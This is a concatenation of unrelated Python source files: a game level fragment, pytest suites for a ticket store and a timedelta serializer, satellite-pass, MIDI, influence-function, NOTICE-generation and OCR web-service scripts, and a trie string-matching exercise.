world.addObjectAtPos (KikiWireStone(), KikiPos (s.x-2, s.y-2, 1))
world.addObjectAtPos (KikiWireStone(), KikiPos (1, s.y-2, s.z-2))
world.addObjectAtPos (KikiWireStone(), KikiPos (s.x-2, s.y-2, s.z-2))
world.addObjectAtPos (KikiWireStone(), KikiPos (s.x/2, s.y-1, s.z/2))
world.addObjectAtPos (KikiMotorGear (KikiFace.PY), KikiPos (s.x/2, 0, 0))
world.addObjectAtPos (KikiMotorCylinder (KikiFace.PY), KikiPos (s.x/2, 1, 0))
""",
}
|
from .check_individuals import check_individuals
from .get_genotypes import get_genotypes
from .check_mendelian_error import check_mendelian_error
from .check_high_quality import check_high_quality
from .check_common_variant import check_common_variant
|
import pytest
import os
import sys
import runAM
import json
# insert project directory to $PATH for imports to work
test_file = os.path.realpath(__file__)
test_dir = os.path.dirname(test_file)
project_dir = os.path.dirname(test_dir)
sys.path.append(project_dir)
def test_000_can_assert_true():
# before any test verify if PyTest is working and can assert True
assert True
def test_010_addServerTicket():
# add server ticket into server_tickets table
inserted_docID_list = list()
# add profile tickets first, as they are recovered to run self.generatePortConfigData()
profileStore = runAM.ProfileTicketStore(database_name='test_store', directory=os.path.join(project_dir, 'temp'))
profileStore.drop_table('profile_tickets')
ticket_filename = os.path.join(test_dir, "data/profile_tickets/fallback.yml")
ticket_data = runAM.read.yaml_file(ticket_filename)
profileStore.addProfileTicket(ticket_data)
# add server tickets
serverStore = runAM.ServerTicketStore(database_name='test_store', directory=os.path.join(project_dir, 'temp'))
serverStore.drop_table('server_tickets')
ticket_filename_list = ['test_server1.yml', 'test_server2.yml', 'test_server4.yml']
for ticket_filename in ticket_filename_list:
fullpath = os.path.join(test_dir, f"data/server_tickets/{ticket_filename}")
ticket_data = runAM.read.yaml_file(fullpath)
docIDs_just_inserted = serverStore.addServerTicket(ticket_data)
for docID in docIDs_just_inserted:
inserted_docID_list.append(docID)
assert inserted_docID_list == ['1', '2', '3']
def test_015_addServerTicket_failed(capsys):
# confirm that ticket with a duplicate switch_name/switch_port combination can not be added
with pytest.raises(SystemExit) as pytest_wrapped_e:
inserted_docID_list = list()
serverStore = runAM.ServerTicketStore(database_name='test_store', directory=os.path.join(project_dir, 'temp'))
# add server ticket into server_tickets table
ticket_filename_list = ['test_server3.yml']
for ticket_filename in ticket_filename_list:
fullpath = os.path.join(test_dir, f"data/server_tickets/{ticket_filename}")
ticket_data = runAM.read.yaml_file(fullpath)
docIDs_just_inserted = serverStore.addServerTicket(ticket_data)
for docID in docIDs_just_inserted:
inserted_docID_list.append(docID)
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 'ERROR: Can not add test_server3. Port Ethernet1/1 on LEAF1B is already in use.'
def test_020_queryServerTicket():
# find a server with specific ID in the server_tickets table
serverStore = runAM.ServerTicketStore(database_name='test_store', directory=os.path.join(project_dir, 'temp'))
server_list = serverStore.queryServerTicket(server_id='test_server1')
assert server_list == [{
"1": {
"server_id": "test_server1",
"notes": [
"add ticket number",
"or any other notes here"
],
"connections": [
{
"switch_name": "LEAF1A",
"switch_port": "Ethernet1/1",
"port_channel": {
"profiles": [
[
"fallback",
"port_channel"
]
],
"mode": "active"
},
"switchport": {
"mode": "trunk",
"vlan": "1, 5-55"
}
},
{
"switch_name": "LEAF1B",
"switch_port": "Ethernet1/1",
"port_channel": {
"profiles": [
[
"fallback",
"port_channel"
]
],
"mode": "active"
},
"switchport": {
"mode": "trunk",
"vlan": "1, 5-55"
}
}
]
}
}]
def test_030_deleteServerTicket():
# delete a server with specific ID in from server_tickets table
serverStore = runAM.ServerTicketStore(database_name='test_store', directory=os.path.join(project_dir, 'temp'))
deleted_docs = serverStore.deleteServerTicket(server_id='test_server1')
assert deleted_docs == ['1']
|
from datetime import timedelta
from typing import Callable, Dict
import pytest
from carica.models import SerializableTimedelta
from random import randint
import random
RANDOM_SEED = 2128348248
random.seed(RANDOM_SEED)
key_tdGetters: Dict[str, Callable[[timedelta], int]] = {
"weeks": lambda td: 0 if td.days < 7 else td.days // 7,
"days": lambda td: td.days - key_tdGetters["weeks"](td) * 7,
"hours": lambda td: 0 if td.seconds < 3600 else td.seconds // 3600,
"minutes": lambda td: 0 if (td.seconds % 3600) < 60 else (td.seconds % 3600) // 60,
"seconds": lambda td: td.seconds - (key_tdGetters["hours"](td) * 3600) - (key_tdGetters["minutes"](td) * 60),
"milliseconds": lambda td: 0 if td.microseconds < 1000 else td.microseconds // 1000,
"microseconds": lambda td: td.microseconds - key_tdGetters["milliseconds"](td) * 1000
}
def distributeSerializedData(data: Dict[str, int]) -> Dict[str, int]:
"""This will flatten out all of the values in data, pushing times up to the largest 'bases' they can fit in
This creates a minimal dict for replacing the same data
"""
td = timedelta(**data)
return {k: key_tdGetters[k](td) for k in key_tdGetters}
def randomTestData(mini=1, maxi=1000):
weeks = randint(mini, maxi)
days = randint(mini, maxi)
hours = randint(mini, maxi)
minutes = randint(mini, maxi)
seconds = randint(mini, maxi)
milliseconds = randint(mini, maxi)
microseconds = randint(mini, maxi)
td = SerializableTimedelta(
weeks=weeks,
days=days,
hours=hours,
minutes=minutes,
seconds=seconds,
milliseconds=milliseconds,
microseconds=microseconds
)
data = {
"weeks": weeks,
"days": days,
"hours": hours,
"minutes": minutes,
"seconds": seconds,
"milliseconds": milliseconds,
"microseconds": microseconds
}
return td, data
sampleData = [
(
# All fields
SerializableTimedelta(
weeks=1,
days=2,
hours=14,
minutes=1,
seconds=532,
milliseconds=2345,
microseconds=1
),
{
"weeks": 1,
"days": 2,
"hours": 14,
"minutes": 1,
"seconds": 532,
"milliseconds": 2345,
"microseconds": 1
}
),
(
# No fields
SerializableTimedelta(),
{
"weeks": 0,
"days": 0,
"hours": 0,
"minutes": 0,
"seconds": 0,
"milliseconds": 0,
"microseconds": 0
}
),
(
# Minimal fields
SerializableTimedelta(
microseconds=1
),
{
"microseconds": 1
}
)
]
numRandomItems = 10
# Add a load of randomly generated test data
sampleData += [randomTestData() for _ in range(numRandomItems)]
@pytest.mark.parametrize(("testTD", "expectedData"), sampleData)
def test_timedelta_serialize_hasCorrectContents(testTD: SerializableTimedelta, expectedData: Dict[str, int]):
serialized = testTD.serialize()
expectedData = distributeSerializedData(expectedData)
for k in key_tdGetters:
if key_tdGetters[k](testTD) != 0:
assert k in serialized
assert k in expectedData
assert serialized[k] == expectedData[k]
return True
@pytest.mark.parametrize(("testData", "expectedTD"), [(data, td) for td, data in sampleData])
def test_timedelta_deserialize_hasCorrectContents(testData: str, expectedTD: SerializableTimedelta):
deserialized = SerializableTimedelta.deserialize(testData)
assert deserialized == expectedTD
return True
@pytest.mark.parametrize(("testTD", "expectedTD"), [(timedelta(**data), td) for td, data in sampleData])
def test_timedelta_fromTimedelta_hasCorrectContents(testTD: timedelta, expectedTD: SerializableTimedelta):
newTD = SerializableTimedelta.fromTimedelta(testTD)
assert test_timedelta_serialize_hasCorrectContents(newTD, expectedTD.serialize())
return True
|
import sys
import math
import ephem
import serial
import Queue
import Command
import time
choice = []
def readingTLE(file):
TLEfile = open(file,'r')
# for ever TLE
for line in TLEfile:
line1 = line
line2 = TLEfile.next().strip()
line3 = TLEfile.next().strip()
iss = ephem.readtle(line1, line2, line3)
obs = ephem.Observer()
obs.lat = '42.02690'
obs.long = '-93.65278'
for p in range(3):
try:
tr, azr, tt, altt, ts, azs = obs.next_pass(iss)
except ValueError:
print "llllll"
finally:
print "Can not see it"
sys.exit(1)
times = Command.PassTimes(tr, ts)
commands = Queue.Queue(0)
while tr < ts:
obs.date = tr
iss.compute(obs)
c = Command.Command(math.degrees(iss.az), math.degrees(iss.alt))
commands.put_nowait(c)
#print commands.get_nowait()
tr = ephem.Date(tr + 1.0 * ephem.second)
choices = Command.Choice(commands, times, altt)
choice.append(choices)
obs.date = tr + ephem.minute
#moveRotor()
print "--------------"
def options(self):
return self.choice;
def moveRotor():
#controllerSerial = serial.Serial(COM3,9600,serial.EIGHTBITS,serial.PARITY_NONE,serial.STOPBITS_ONE)
c = choice[0]
b = Queue.Queue(0)
b = c.getCommands()
while not b.empty():
#print q.__name__
#controllerSerial.write(a)
print b.get_nowait().__repr__()
time.sleep(1)
readingTLE('weather.txt')
|
#!/usr/bin/env python
"""
Send random notes to the output port.
"""
from __future__ import print_function
import sys
import time
import random
import mido
from mido import Message
if len(sys.argv) > 1:
portname = sys.argv[1]
else:
portname = None # Use default port
# A pentatonic scale
notes = [60, 62, 64, 67, 69, 72]
try:
with mido.open_output(portname, autoreset=True) as port:
print('Using {}'.format(port))
while True:
note = random.choice(notes)
on = Message('note_on', note=note)
print('Sending {}'.format(on))
port.send(on)
time.sleep(0.05)
off = Message('note_off', note=note)
print('Sending {}'.format(off))
port.send(off)
time.sleep(0.1)
except KeyboardInterrupt:
pass
print()
|
import argparse
import numpy as np
import torch
import config
device = torch.device('cuda')
def to_np(x):
return x.data.cpu().numpy()
def to_tensor(x):
return torch.tensor(x).float().to(device)
def load_data(path):
file = np.load('{}/saved_outputs.npz'.format(path))
intermediate_x_train = to_tensor(file['intermediate_train'])
intermediate_x_test = to_tensor(file['intermediate_test'])
y_pred = to_tensor(file['pred_train']).squeeze()
y = to_tensor(file['labels_train']).float()
y_test = to_tensor(file['labels_test']).float()
W = to_tensor(file['weight']).to(device)
return intermediate_x_train, intermediate_x_test, y_pred, y, y_test, W
def calculate_grads(path):
intermediate_x_train, intermediate_x_test, y_pred, y, y_test, W = load_data(path)
intermediate_x_train = intermediate_x_train.squeeze().unsqueeze(1)
intermediate_x_test = intermediate_x_test.squeeze().unsqueeze(1)
# use trained model to calculate influences
Phi = torch.sigmoid(torch.matmul(intermediate_x_train, W.transpose(0, 1)).squeeze())
grad_first = torch.bmm((Phi - y).view(-1, 1, 1), intermediate_x_train)
Phi_test = torch.sigmoid(torch.matmul(intermediate_x_test, W.transpose(0, 1)).squeeze())
jaccobian_test = torch.bmm((Phi_test - y_test).view(-1, 1, 1), intermediate_x_test)
grad_second = torch.bmm(torch.bmm(intermediate_x_train.transpose(1, 2), (Phi * (1 - Phi)).view(-1, 1, 1)),
intermediate_x_train)
hessian_inverse = torch.inverse(torch.mean(grad_second, dim=0))
return grad_first, hessian_inverse, jaccobian_test
def calculate_influence_weights(path):
grads_first, hessian_inverse, jaccobian_test = calculate_grads('{}/model'.format(path))
samples = len(grads_first)
weight_matrix = []
self_influence = []
for i in range(samples):
weight = (-1 / samples) * torch.matmul(hessian_inverse, grads_first[i].transpose(0, 1))
weight_matrix.append(weight)
self_influence.append(-1 * torch.matmul(grads_first[i], weight))
weight_matrix = torch.stack(weight_matrix)
self_influence = torch.stack(self_influence)
np.savez('{}/calculated_weights/influence_weight_matrix'.format(path),
weight_matrix=to_np(weight_matrix), self_influence=to_np(self_influence),
jaccobian_test=to_np(jaccobian_test))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Calculate Influence Function weights')
parser.add_argument('--model', default='RNN', type=str, help='Interested model: CNN, RNN, or Xgboost')
args = parser.parse_args()
calculate_influence_weights(path='{}/models/{}/saved_models/base'.format(config.project_root, args.model))
|
#!/usr/bin/env python3
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
import yaml
from collections import defaultdict
outfile = None
moduleHeaderLine = "#" * 12
dependencyHeaderLine = "=" * 17
def print_outfile(string):
print(string, file=outfile)
def print_log_to_stderr(string):
print(string, file=sys.stderr)
def print_notice(dependency):
# note that a dependency may either supply a global notice in the 'notice' field, or, a per jar notice in the
# 'notices' field
if 'notice' in dependency:
# single notice for dependency name, list out all 'libraries' if any, then print notice
print_outfile("{} {} {} {}".format(dependencyHeaderLine, dependency['name'], dependency['version'], dependencyHeaderLine))
if 'libraries' in dependency:
for library in dependency['libraries']:
for group_id, artifact_id in library.items():
print_outfile("{}.jar".format(artifact_id))
print_outfile("{}".format(dependencyHeaderLine))
print_outfile("{}\n\n\n\n".format(dependency['notice']))
elif 'notices' in dependency:
# if 'notices' is set instead of 'notice', then it has jar specific notices to print
for notice_entry in dependency['notices']:
for jar, notice in notice_entry.items():
print_outfile("{} {}-{}.jar {}".format(dependencyHeaderLine, jar, dependency['version'], dependencyHeaderLine))
print_outfile("{}\n\n\n\n".format(notice))
def generate_notice(source_notice, dependences_yaml):
print_log_to_stderr("=== Generating the contents of NOTICE.BINARY file ===\n")
# Print Apache license first.
print_outfile(source_notice)
with open(dependences_yaml, encoding='utf-8') as registry_file:
dependencies = list(yaml.load_all(registry_file))
# Group dependencies by module
modules_map = defaultdict(list)
for dependency in dependencies:
if 'notice' in dependency or 'notices' in dependency:
modules_map[dependency['module']].append(dependency)
# print notice(s) of dependencies by module
for module_name, dependencies_of_module in modules_map.items():
print_outfile("{} BINARY/{} {}\n".format(moduleHeaderLine, module_name.upper(), moduleHeaderLine))
for dependency in dependencies_of_module:
print_notice(dependency)
if __name__ == "__main__":
try:
parser = argparse.ArgumentParser(description='generate binary notice file.')
parser.add_argument('notice', metavar='<path to apache notice file>', type=str)
parser.add_argument('license_yaml', metavar='<path to license.yaml>', type=str)
parser.add_argument('out_path', metavar='<path to output file>', type=str)
args = parser.parse_args()
with open(args.notice, encoding="ascii") as apache_notice_file:
source_notice = apache_notice_file.read()
dependencies_yaml = args.license_yaml
with open(args.out_path, "w", encoding="utf-8") as outfile:
generate_notice(source_notice, dependencies_yaml)
except KeyboardInterrupt:
print('Interrupted, closing.')
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddle_serving_client import Client
import cv2
import sys
import numpy as np
import os
import time
import re
import base64
from tools.infer.predict_det import TextDetector
from params import read_params
global_args = read_params()
if global_args.use_gpu:
from paddle_serving_server_gpu.web_service import WebService
else:
from paddle_serving_server.web_service import WebService
class TextDetectorHelper(TextDetector):
def __init__(self, args):
super(TextDetectorHelper, self).__init__(args)
if self.det_algorithm == "SAST":
self.fetch = [
"bn_f_border4.output.tmp_2", "bn_f_tco4.output.tmp_2",
"bn_f_tvo4.output.tmp_2", "sigmoid_0.tmp_0"
]
elif self.det_algorithm == "EAST":
self.fetch = ["sigmoid_0.tmp_0", "tmp_2"]
elif self.det_algorithm == "DB":
self.fetch = ["save_infer_model/scale_0.tmp_0"]
def preprocess(self, img):
img = img.copy()
im, ratio_list = self.preprocess_op(img)
if im is None:
return None, 0
return {
"image": im.copy()
}, self.fetch, {
"ratio_list": [ratio_list],
"ori_im": img
}
def postprocess(self, outputs, args):
outs_dict = {}
if self.det_algorithm == "EAST":
outs_dict['f_geo'] = outputs[0]
outs_dict['f_score'] = outputs[1]
elif self.det_algorithm == 'SAST':
outs_dict['f_border'] = outputs[0]
outs_dict['f_score'] = outputs[1]
outs_dict['f_tco'] = outputs[2]
outs_dict['f_tvo'] = outputs[3]
else:
outs_dict['maps'] = outputs[0]
dt_boxes_list = self.postprocess_op(outs_dict, args["ratio_list"])
dt_boxes = dt_boxes_list[0]
if self.det_algorithm == "SAST" and self.det_sast_polygon:
dt_boxes = self.filter_tag_det_res_only_clip(dt_boxes,
args["ori_im"].shape)
else:
dt_boxes = self.filter_tag_det_res(dt_boxes, args["ori_im"].shape)
return dt_boxes
class DetService(WebService):
def init_det(self):
self.text_detector = TextDetectorHelper(global_args)
def preprocess(self, feed=[], fetch=[]):
data = base64.b64decode(feed[0]["image"].encode('utf8'))
data = np.fromstring(data, np.uint8)
im = cv2.imdecode(data, cv2.IMREAD_COLOR)
feed, fetch, self.tmp_args = self.text_detector.preprocess(im)
return feed, fetch
def postprocess(self, feed={}, fetch=[], fetch_map=None):
outputs = [fetch_map[x] for x in fetch]
res = self.text_detector.postprocess(outputs, self.tmp_args)
return {"boxes": res.tolist()}
if __name__ == "__main__":
ocr_service = DetService(name="ocr")
ocr_service.load_model_config(global_args.det_model_dir)
ocr_service.init_det()
if global_args.use_gpu:
ocr_service.prepare_server(
workdir="workdir", port=9292, device="gpu", gpuid=0)
else:
ocr_service.prepare_server(workdir="workdir", port=9292, device="cpu")
ocr_service.run_debugger_service()
ocr_service.run_web_service()
|
# python3
import sys
def build_trie(patterns):
tree = dict()
tree[0] = dict()
nodecount = 1
for p in patterns:
p = p + "$"
currentNode = tree[0]
for i in range(len(p)):
currentSymbol = p[i]
if currentSymbol in currentNode:
currentNode = tree[currentNode[currentSymbol]]
else:
currentNode[currentSymbol] = nodecount
tree[nodecount] = dict()
currentNode = tree[nodecount]
nodecount += 1
return tree
def solve (text, n, patterns):
result = []
tree = build_trie(patterns)
for s in range(len(text)):
currentnode = tree[0]
symbol = text[s]
counter = s
while True:
if "$" in currentnode:
result.append(s)
break
elif symbol in currentnode and counter != len(text):
currentnode = tree[currentnode[symbol]]
if counter+1 < len(text):
symbol = text[counter+1]
counter += 1
else:
break
return result
if __name__ == "__main__":
text = sys.stdin.readline().strip ()
n = int (sys.stdin.readline().strip())
patterns = []
for i in range (n):
patterns += [sys.stdin.readline().strip()]
ans = solve(text, n, patterns)
sys.stdout.write (' '.join(map (str, ans)) + '\n')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.